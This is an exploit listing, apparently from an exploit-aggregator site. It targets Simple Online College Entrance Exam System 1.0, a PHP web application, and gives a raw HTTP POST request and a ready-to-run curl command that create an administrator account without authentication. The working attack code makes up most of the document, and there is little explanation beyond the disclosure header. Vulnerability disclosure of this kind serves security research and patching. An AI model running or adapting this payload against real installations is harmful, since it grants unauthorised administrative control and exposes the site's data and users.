Exploit for Simple Online College Entrance Exam System 1.0 Unauthenticated Admin Creation

Name: Exploit for Simple Online College Entrance Exam System 1.0 Unauthenticated Admin Creation
Rating: 5 (261 reviews)

2021-10-08 | CVSS 0.4

## https://sploitus.com/exploit?id=PACKETSTORM:164441
# Exploit Title: Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation  
# Date: 07.10.2021  
# Exploit Author: Amine ismail @aminei_  
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code  
# Version: 1.0  
# Tested on: Windows 10, Kali Linux  
# Unauthenticated admin creation  
  
Unauthenticated admin creation:  
  
Request:  
POST /entrance_exam/Actions.php?a=save_admin HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 42  
  
id=&fullname=admin2&username=admin2&type=1  
  
PoC to create an admin user named exploitdb and password exploitdb:  
curl -d "id=&fullname=admin&username=exploitdb&type=1&password=916b5dbd201b469998d9b4a4c8bc4e08" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=save_admin'